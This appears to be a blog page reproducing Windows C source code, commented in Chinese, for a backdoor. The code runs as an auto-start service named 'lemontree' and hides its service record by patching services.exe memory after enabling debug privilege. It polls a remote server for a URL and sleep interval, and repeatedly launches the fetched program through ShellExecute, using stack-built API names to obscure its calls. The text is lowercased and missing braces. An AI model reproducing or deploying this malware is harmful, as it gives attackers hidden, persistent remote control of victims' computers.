char recv_buff[1024] = { 0 };
recv( sock, recv_buff, 1000, 0 );
if( !recv_buff )
closesocket( sock );
wsacleanup( );
goto getconfig_error;
closesocket( sock );
wsacleanup( );
char *content = strstr( recv_buff, "\r\n\r\n" );
if( !content )
goto getconfig_error;
content += strlen("\r\n\r\n");
#ifdef debug
memset( tmp, 0, sizeof(tmp) );
wchar c[256] = { 0 };
multi_to_wide( c, content );
wsprintf( tmp, l"config content is:\n%s\n", c );
logtofile( tmp );
char *split_flag = strstr( content, "|" );
if( !split_flag )
goto getconfig_error;
char tmp_time[32] = { 0 };
char tmp_url[512] = { 0 };
if( split_flag - content > 32 )
sleep_time = default_sleep_time;
strncpy( tmp_time, content, split_flag - content );
sleep_time = atoi( tmp_time );
if( strlen( split_flag ) >= 512 )
strcpy( url_path, default_url );
strcpy( url_path, split_flag + 1 );
sleep_time = default_sleep_time;
strcpy( url_path, default_url );
* 记录日志函数
#ifdef debug
void logtofile( wchar *str )
file *fp;
fp = fopen( debug_log, "a" );
fwprintf( fp, l"%s\n", str );
fclose( fp );
// yunshu(pst) copy from zzzevazzz(pst)'s code
// 几个undocument的结构
typedef struct _sc_service_process sc_service_process, *psc_service_process;
typedef struct _sc_depend_service sc_depend_service, *psc_depend_service;
typedef struct _sc_service_record sc_service_record, *psc_service_record;
typedef struct _sc_service_process
psc_service_process previous;
psc_service_process next;
wchar *imagepath;
dword pid;
dword numberofservices;
// ...
} sc_service_process, *psc_service_process;
typedef struct _sc_depend_service
psc_depend_service next;
dword unknow;
psc_service_record service;
// ...
} sc_depend_service, *psc_depend_service;
typedef struct _sc_service_record
psc_service_record previous;
psc_service_record next;
wchar *servicename;
wchar *displayname;
dword index;
dword unknow0;
dword serv;
dword controlcount;
dword unknow1;
psc_service_process process;
service_status status;
dword starttype;
dword errorcontrol;
dword tagid;
psc_depend_service dependon;
psc_depend_service depended;
// ...
} sc_service_record, *psc_service_record;
bool setdebugprivilege()
bool bret = false;
handle htoken = null;
luid luid;
token_privileges tp;
if (openprocesstoken(getcurrentprocess(), token_all_access, &htoken) &&
lookupprivilegevalue(null, se_debug_name, &luid))
tp.privilegecount = 1;
tp.privileges[0].luid = luid;
tp.privileges[0].attributes = se_privilege_enabled;
bret = adjusttokenprivileges(htoken, false, &tp, sizeof(token_privileges), null, null);
if (htoken) closehandle(htoken);
return bret;
dword getprocessidbyname(wchar *name)
bool bret = false;
handle hprocesssnap = null;
processentry32 pe32 = { 0 };
dword pid = -1;
hprocesssnap = createtoolhelp32snapshot(th32cs_snapprocess, 0);
if (invalid_handle_value == hprocesssnap) return -1;
pe32.dwsize = sizeof(processentry32);
if (process32first(hprocesssnap, &pe32))
if ( !_wcsicmp(pe32.szexefile, name ) )
pid = pe32.th32processid;
while (process32next(hprocesssnap, &pe32));
return pid;
// 修改内存属性为指定值
void protectwritedword(handle hprocess, dword *addr, dword value)
memory_basic_information mbi;
dword dwoldprotect, dwwritten;
virtualqueryex(hprocess, addr, &mbi, sizeof(mbi));
virtualprotectex(hprocess, mbi.baseaddress, mbi.regionsize, page_readwrite, &mbi.protect);
writeprocessmemory(hprocess, addr, &value, sizeof(dword), &dwwritten);
virtualprotectex(hprocess, mbi.baseaddress, mbi.regionsize, mbi.protect, &dwoldprotect);
psc_service_record findfirstservicerecord(handle hprocess)
wchar filename[max_path+1];
handle hfile, hfilemap;
uchar * pmap;
dword dwsize, dwsizehigh, i, dwread;
sc_service_record svcrd, *psvcrd, *pret = null;
getsystemdirectory( filename, max_path );
wcscat( filename, l"\services.exe");
hfile = createfile(filename, generic_read, file_share_read,
null, open_existing, 0, null);
if (invalid_handle_value == hfile) return null;
dwsizehigh = 0;
dwsize = getfilesize(hfile, &dwsizehigh);
hfilemap = createfilemapping(hfile, null, page_readonly, 0, 0, null);
if (null == hfilemap) return null;
pmap = (uchar*)mapviewoffile(hfilemap, file_map_read, 0, 0, 0);
if (null == pmap) return null;
dwsize -= 12;
for (i=0; i<dwsize; ++i)
// 搜索services!scgetservicedatabase特征代码
if (*(dword*)(pmap+i) == 0xa1909090 &&
*(dword*)(pmap+i+8) == 0x909090c3)
#ifdef debug
wchar tmpbuffer[256] = { 0 };
wsprintf( tmpbuffer, l"map is 0x%08x\n", (dword *)(pmap+i) );
logtofile( tmpbuffer );
if (readprocessmemory(hprocess, *(pvoid*)(pmap+i+4), &psvcrd, sizeof(pvoid), &dwread) &&
readprocessmemory(hprocess, psvcrd, &svcrd, sizeof(svcrd), &dwread) &&
svcrd.serv == 'vres') // servicerecord结构的特征
pret = psvcrd;
#ifdef debug
wchar tmpbuffer[256] = { 0 };
wsprintf( tmpbuffer, l"pret is 0x%08x\n", (dword *)(psvcrd) );
logtofile( tmpbuffer );
//printf( "addr: 0x%08x\n", (dword *)pret );
return pret;
// 隐藏服务
bool hideservice( wchar *name )
dword pid;
handle hprocess;
sc_service_record svcrd, *psvcrd;
dword dwread, dwnamesize;
wchar svcname[max_path] = { 0 };
dwnamesize = ( wcslen(name) + 1 ) * sizeof(wchar);
if (dwnamesize > sizeof(svcname)) return false;
pid = getprocessidbyname( text("services.exe") );
#ifdef debug
wchar tmpbuffer1[256] = { 0 };
wsprintf( tmpbuffer1, l"pid is %d\n", pid );
logtofile( tmpbuffer1 );
if (pid == -1) return false;
if( ! setdebugprivilege() ) return false;
hprocess = openprocess(process_all_access, false, pid);
if (null == hprocess) return false;
psvcrd = findfirstservicerecord(hprocess);
if (null == psvcrd)
#ifdef debug
logtofile( l"can't find servicedatabase.\n" );
return false;
if (readprocessmemory(hprocess, psvcrd, &svcrd, sizeof(svcrd), &dwread) &&
readprocessmemory(hprocess, svcrd.servicename, svcname, dwnamesize, &dwread))
// 匹配服务名
if ( 0 == _wcsicmp(svcname, name) )
// 从链表中断开(一般来说servicerecord是可写的,但还是先改保护属性以防万一)
protectwritedword(hprocess, (dword *)svcrd.previous+1, (dword)svcrd.next);
protectwritedword(hprocess, (dword *)svcrd.next, (dword)svcrd.previous);
#ifdef debug
wchar tmpbuffer2[256] = { 0 };
wsprintf( tmpbuffer2, l"the service \"%s\" is hidden successfully.\n", name );
logtofile( tmpbuffer1 );
return true;
while (psvcrd = svcrd.next);
if( null != hprocess )
return false;
typedef struct _arguments
char myurl[512];
char myprogram[512];
farproc myloadlibrary;
farproc mygetaddress;
char mykerneldll[32];
char myshelldll[32];
char myzeromemory[32];
char myshellexecute[32];
dword sleeptime;
* winapi函数原形
typedef hmodule (__stdcall *loadlibrarya)( in char* lpfilename );
typedef farproc (__stdcall *getprocaddress)( in hmodule hmodule, in char* lpprocname );
typedef void (__stdcall *zeromemory)( in pvoid destination, in size_t length );
void __stdcall customfunction( lpvoid my_arguments )
arguments *func_args = (arguments *)my_arguments;
loadlibrarya loadlibrarya = (loadlibrarya)func_args->myloadlibrary;
getprocaddress getprocaddress = (getprocaddress)func_args->mygetaddress;
hmodule h_kernel = loadlibrarya( func_args->mykerneldll );
hmodule h_shell = loadlibrarya( func_args->myshelldll );
zeromemory zeromemory = (zeromemory)getprocaddress( h_kernel, func_args->myzeromemory );
dword myshellexecutea = (dword)getprocaddress( h_shell, func_args->myshellexecute );
dword mysleep;
dword sleep_time = func_args->sleeptime;
push eax
push esp
sub esp, 6
mov byte ptr [esp], 's'
mov byte ptr [esp+1], 'l'
mov byte ptr [esp+2], 'e'
mov byte ptr [esp+3], 'e'
mov byte ptr [esp+4], 'p'
mov byte ptr [esp+5], ''
lea eax, [esp]
push eax
push h_kernel
call getprocaddress
mov mysleep, eax
add esp, 6
pop esp
pop eax
while( 1 )
push eax
push esp
push ecx
push ebx
sub esp, 256
mov byte ptr [esp], 'o'
mov byte ptr [esp+1], 'p'
mov byte ptr [esp+2], 'e'
mov byte ptr [esp+3], 'n'
mov byte ptr [esp+4], ''
lea ebx, [esp]
push sw_showmaximized
push 0
push func_args
mov ecx, func_args
add ecx, 200h
lea eax, [ecx]
push eax
push ebx
push 0
call myshellexecutea
add esp, 256
pop ebx
pop ecx
pop esp
pop eax
push sleep_time
call mysleep
* 全局变量
#define service_name l"lemontree"
#define service_description l"lemontree"
#define service_display_name l"lemontree"
service_status servicestatus;
service_status_handle hservicestatus;
bool serviceinstall( wchar * ); //安装服务
bool serviceunstall( wchar * ); //删除服务
void servicecontrol( dword ); //控制服务
bool serviceexists( wchar * ); //判断服务是否存在
* 安装服务
* 参数:主程序全路径
* 返回:成功返回true,否则为false
bool serviceinstall( wchar *exefilepath )
wchar tmppath[max_path] = { 0 };
hkey key;
sc_handle servicemangerhandle = openscmanager( null, null, sc_manager_create_service );
if ( servicemangerhandle == 0 )
printf( "install: open services manager database error: %d\n", getlasterror() );
return false;
sc_handle servicehandle = createservice
servicemangerhandle ,
service_name ,
service_display_name ,
service_all_access ,
service_win32_own_process ,
service_auto_start ,
service_error_normal ,
exefilepath ,
null ,
null ,
null ,
null ,
if ( servicehandle == 0 )
printf( "create service error: %d\n", getlasterror() );
closeservicehandle( servicemangerhandle );
return false;
wcscpy( tmppath, l"system\currentcontrolset\services\" );
wcscat( tmppath, service_name );
if( regopenkey( hkey_local_machine, tmppath, &key ) != error_success )
printf( "open key %s error: %d\n", tmppath, getlasterror() );
return false;
regsetvalueex( key, l"description", 0, reg_sz, (byte *)service_description, wcslen(service_description) );
if( !startservice( servicehandle, 0, 0 ) )
printf( "install service ok, but start it error: %d\n", getlasterror() );
printf( "install service ok, start it ok.\n" );
closeservicehandle( servicehandle );
closeservicehandle( servicemangerhandle );
return true;
* 删除服务
bool serviceunstall( wchar *servicename )
sc_handle scmhandle = openscmanager (null, null, sc_manager_all_access);
if ( scmhandle == null )
return false;
sc_handle schandle = openservice( scmhandle, servicename, service_all_access );
if( schandle == null )
closeservicehandle( scmhandle );
return false;
deleteservice( schandle );
closeservicehandle( schandle );
closeservicehandle( scmhandle );
return true;
* 服务控制函数
void servicecontrol( dword request )
#ifdef debug
logtofile( l"servicecontrol: into servicecontrol\n" );
switch ( request )
case service_control_pause:
servicestatus.dwcurrentstate = service_paused;
case service_control_continue:
servicestatus.dwcurrentstate = service_running;
case service_control_stop:
#ifdef debug
logtofile( l"servicecontrol: try to stop service\n" );
servicestatus.dwwin32exitcode = 0;
servicestatus.dwcurrentstate = service_stop_pending;
servicestatus.dwcheckpoint = 0;
servicestatus.dwwaithint = 0;
case service_control_interrogate:
#ifdef debug
logtofile( l"servicecontrol: error arguments\n" );
if( !setservicestatus( hservicestatus, &servicestatus ) )
#ifdef debug
wchar tmp[256] = { 0 };
wsprintf( tmp, l"servicemain: control service error: %d\n", getlasterror() );
logtofile( tmp );
bool serviceexists( wchar *path )
wchar tmppath[max_path] = { 0 };
hkey key;
wchar value[512] = { 0 };
int type = reg_expand_sz;
int size = sizeof(value);
wcscpy( tmppath, l"system\currentcontrolset\services\" );
wcscat( tmppath, service_name );
if( regopenkeyex( hkey_local_machine, tmppath, 0, key_query_value, &key ) != error_success )
//printf( "regopenkeyex error: %d\n", getlasterror() );
return false;
if( regqueryvalueex( key, l"imagepath", null, (dword *)&type, (byte *)value, (dword *)&size ) != error_success )
//printf( "regqueryvalueex error: %d\n", getlasterror() );
return false;
if( key ) regclosekey( key );
// 如果服务的程序路径等于后门本身,表示已经安装
if( 0 == _wcsicmp( value, path ) )
return true;
return false;
上一篇: 合理的创业思路很重要
下一篇: PHP sesion相关问题